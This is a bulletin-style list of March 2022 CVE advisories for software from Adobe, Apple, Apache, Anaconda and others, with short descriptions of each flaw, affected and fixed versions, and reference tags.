All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.2022-03-17not yet calculatedCVE-2022-25760
MISC
MISC
admidio -- admidio
 
Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9.2022-03-19not yet calculatedCVE-2022-0991
MISC
CONFIRM
adobe -- acrobat_reader_dcAcrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file.2022-03-18not yet calculatedCVE-2022-24092
MISC
adobe -- acrobat_reader_dc
 
Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file.2022-03-18not yet calculatedCVE-2022-24091
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40740
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40737
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40738
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40739
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40735
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40741
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40742
MISC
adobe -- auditionAdobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40736
MISC
adobe -- audition
 
Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a SVG file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40734
MISC
adobe -- bridgeAdobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-42729
MISC
adobe -- bridgeAdobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious PSD file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-42730
MISC
adobe -- bridgeAdobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-42720
MISC
adobe -- bridgeAdobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-42722
MISC
adobe -- bridgeAdobe Bridge 11.1.1 (and earlier) is affected by a stack overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Bridge.2022-03-16not yet calculatedCVE-2021-42728
MISC
adobe -- bridgeAdobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-42724
MISC
adobe -- bridge
 
Adobe Bridge version 11.1.1 (and earlier) is affected by a double free vulnerability when parsing a crafted DCM file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.2022-03-16not yet calculatedCVE-2021-42533
MISC
adobe -- bridge
 
Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .jpe file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-42719
MISC
adobe -- bridge
 
Adobe Bridge version 11.1.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40750
MISC
adobe -- character_animatorAdobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40769
MISC
adobe -- character_animatorAdobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40768
MISC
adobe -- character_animatorAdobe Character Animator version 4.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40767
MISC
adobe -- character_animatorAdobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40766
MISC
adobe -- character_animatorAdobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40765
MISC
adobe -- character_animatorAdobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40764
MISC
adobe -- character_animatorAdobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40763
MISC
adobe -- character_animator
 
Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40762
MISC
adobe -- media_encoderAdobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40782
MISC
adobe -- media_encoderAdobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40781
MISC
adobe -- media_encoderAdobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40780
MISC
adobe -- media_encoderAdobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40779
MISC
adobe -- media_encoderAdobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40778
MISC
adobe -- media_encoder
 
Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40777
MISC
adobe -- premiere_elementsAdobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40787
MISC
adobe -- premiere_elementsAdobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40786
MISC
adobe -- premiere_elementsAdobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40788
MISC
adobe -- premiere_elementsAdobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40789
MISC
adobe -- premiere_elementsAdobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-42527
MISC
adobe -- premiere_elements
 
Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40785
MISC
adobe -- premiere_elements
 
Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-42526
MISC
adobe -- premiere_proAdobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40793
MISC
adobe -- premiere_proAdobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-40796
MISC
adobe -- premiere_proAdobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-42264
MISC
adobe -- premiere_proAdobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40792
MISC
adobe -- premiere_pro
 
Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.2022-03-16not yet calculatedCVE-2021-40794
MISC
adobe -- premiere_pro
 
Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2022-03-16not yet calculatedCVE-2021-42263
MISC
advanced_product_labels_for_woocommerce -- advanced_product_labels_for_woocommerce
 
The Advanced Product Labels for WooCommerce WordPress plugin before 1.2.3.7 does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action's response, leading to a Reflected Cross-Site Scripting2022-03-14not yet calculatedCVE-2022-0399
CONFIRM
MISC
anaconda -- anaconda3
 
Anaconda Anaconda3 through 2021.11.0.0 and Miniconda3 through 11.0.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed.)2022-03-17not yet calculatedCVE-2022-26526
MISC
MISC
MISC
apache -- cloudstack
 
Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite. This feature is not enabled by default, the attacker is required to know or guess the project ID for the invite in addition to the invitation token, and the attacker would need to be an existing authorized user of CloudStack.2022-03-15not yet calculatedCVE-2022-26779
MISC
MISC
MLIST
apple -- ios_and_ipados
 
A resource exhaustion issue was addressed with improved input validation. This issue is fixed in iOS 15.2.1 and iPadOS 15.2.1. Processing a maliciously crafted HomeKit accessory name may cause a denial of service.2022-03-18not yet calculatedCVE-2022-22588
MISC
apple -- macos_monterey
 
A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to access information about a user's contacts.2022-03-18not yet calculatedCVE-2022-22644
MISC
apple -- macos_monterey
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22591
MISC
apple -- macos_monterey
 
Multiple issues were addressed by updating to curl version 7.79.1. This issue is fixed in macOS Monterey 12.3. Multiple issues in curl.2022-03-18not yet calculatedCVE-2022-22623
MISC
apple -- macos_monterey
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22586
MISC
apple -- macos_monterey
 
This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A person with access to a Mac may be able to bypass Login Window.2022-03-18not yet calculatedCVE-2022-22647
MISC
MISC
MISC
apple -- macos_monterey
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.2022-03-18not yet calculatedCVE-2022-22651
MISC
apple -- macos_monterey
 
This issue was addressed with a new entitlement. This issue is fixed in macOS Monterey 12.3. An app may be able to spoof system notifications and UI.2022-03-18not yet calculatedCVE-2022-22660
MISC
apple -- macos_monterey
 
A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.2022-03-18not yet calculatedCVE-2022-22665
MISC
apple -- macos_monterey
 
A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22669
MISC
apple -- multiple_productsThe issue was addressed with additional permissions checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to read other applications' settings.2022-03-18not yet calculatedCVE-2022-22609
MISC
MISC
MISC
MISC
apple -- multiple_productsA logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An attacker in a privileged network position may be able to leak sensitive user information.2022-03-18not yet calculatedCVE-2022-22659
MISC
apple -- multiple_productsA type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22661
MISC
MISC
MISC
apple -- multiple_productsAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22664
MISC
MISC
MISC
apple -- multiple_productsA memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. Processing a maliciously crafted image may lead to heap corruption.2022-03-18not yet calculatedCVE-2022-22666
MISC
MISC
MISC
apple -- multiple_productsA use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22667
MISC
apple -- multiple_productsAn access issue was addressed with improved access restrictions. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. A malicious application may be able to identify what other applications a user has installed.2022-03-18not yet calculatedCVE-2022-22670
MISC
MISC
MISC
apple -- multiple_productsAn authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen.2022-03-18not yet calculatedCVE-2022-22671
MISC
apple -- multiple_productsThis issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A user may send audio and video in a FaceTime call without knowing that they have done so.2022-03-18not yet calculatedCVE-2022-22643
MISC
MISC
apple -- multiple_productsThe issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences.2022-03-18not yet calculatedCVE-2022-22600
MISC
MISC
MISC
MISC
apple -- multiple_productsA user interface issue was addressed. This issue is fixed in watchOS 8.5, Safari 15.4. Visiting a malicious website may lead to address bar spoofing.2022-03-18not yet calculatedCVE-2022-22654
MISC
MISC
apple -- multiple_productsDescription: A permissions issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen.2022-03-18not yet calculatedCVE-2022-22599
MISC
MISC
MISC
MISC
apple -- multiple_productsAn issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 15.4 and iPadOS 15.4. An app may be able to learn information about the current camera view before being granted camera access.2022-03-18not yet calculatedCVE-2022-22598
MISC
apple -- multiple_productsA memory corruption issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted file may lead to arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22597
MISC
MISC
MISC
apple -- multiple_productsA memory corruption issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22596
MISC
MISC
apple -- multiple_productsA cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information.2022-03-18not yet calculatedCVE-2022-22594
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. A malicious application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22593
MISC
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.2022-03-18not yet calculatedCVE-2022-22592
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22590
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..2022-03-18not yet calculatedCVE-2022-22587
MISC
MISC
MISC
apple -- multiple_productsAn issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access a user's files.2022-03-18not yet calculatedCVE-2022-22585
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. Processing a maliciously crafted file may lead to arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22584
MISC
MISC
MISC
MISC
apple -- multiple_productsA permissions issue was addressed with improved validation. This issue is fixed in Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access restricted files.2022-03-18not yet calculatedCVE-2022-22583
MISC
MISC
MISC
apple -- multiple_productsAn information disclosure issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22579
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA memory initialization issue was addressed with improved memory handling. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22657
MISC
MISC
MISC
apple -- multiple_productsA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22614
MISC
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4. A malicious website may be able to access information about the user and their devices.2022-03-18not yet calculatedCVE-2022-22653
MISC
apple -- multiple_productsAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.2022-03-18not yet calculatedCVE-2022-22627
MISC
MISC
MISC
apple -- multiple_productsA buffer overflow was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. A malicious application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22634
MISC
MISC
apple -- multiple_productsAn out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to gain elevated privileges.2022-03-18not yet calculatedCVE-2022-22635
MISC
MISC
apple -- multiple_productsAn out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22636
MISC
MISC
apple -- multiple_productsThis issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions.2022-03-18not yet calculatedCVE-2022-22622
MISC
apple -- multiple_productsThis issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to read restricted memory.2022-03-18not yet calculatedCVE-2022-22648
MISC
MISC
MISC
apple -- multiple_productsAn out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.2022-03-18not yet calculatedCVE-2022-22631
MISC
MISC
MISC
apple -- multiple_productsA null pointer dereference was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An attacker in a privileged position may be able to perform a denial of service attack.2022-03-18not yet calculatedCVE-2022-22638
MISC
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges.2022-03-18not yet calculatedCVE-2022-22639
MISC
MISC
apple -- multiple_productsA memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22640
MISC
MISC
MISC
MISC
apple -- multiple_productsA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges.2022-03-18not yet calculatedCVE-2022-22641
MISC
MISC
MISC
apple -- multiple_productsThis issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt.2022-03-18not yet calculatedCVE-2022-22642
MISC
apple -- multiple_productsA logic issue was addressed with improved state management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, watchOS 8.5, macOS Monterey 12.3. A malicious application may be able to elevate privileges.2022-03-18not yet calculatedCVE-2022-22632
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsA memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22633
MISC
MISC
MISC
MISC
apple -- multiple_productsThis issue was addressed with improved checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions.2022-03-18not yet calculatedCVE-2022-22621
MISC
MISC
MISC
MISC
apple -- multiple_productsA use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..2022-03-18not yet calculatedCVE-2022-22620
MISC
MISC
MISC
apple -- multiple_productsThis issue was addressed with improved checks. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt.2022-03-18not yet calculatedCVE-2022-22618
MISC
MISC
apple -- multiple_productsA logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.2022-03-18not yet calculatedCVE-2022-22617
MISC
MISC
MISC
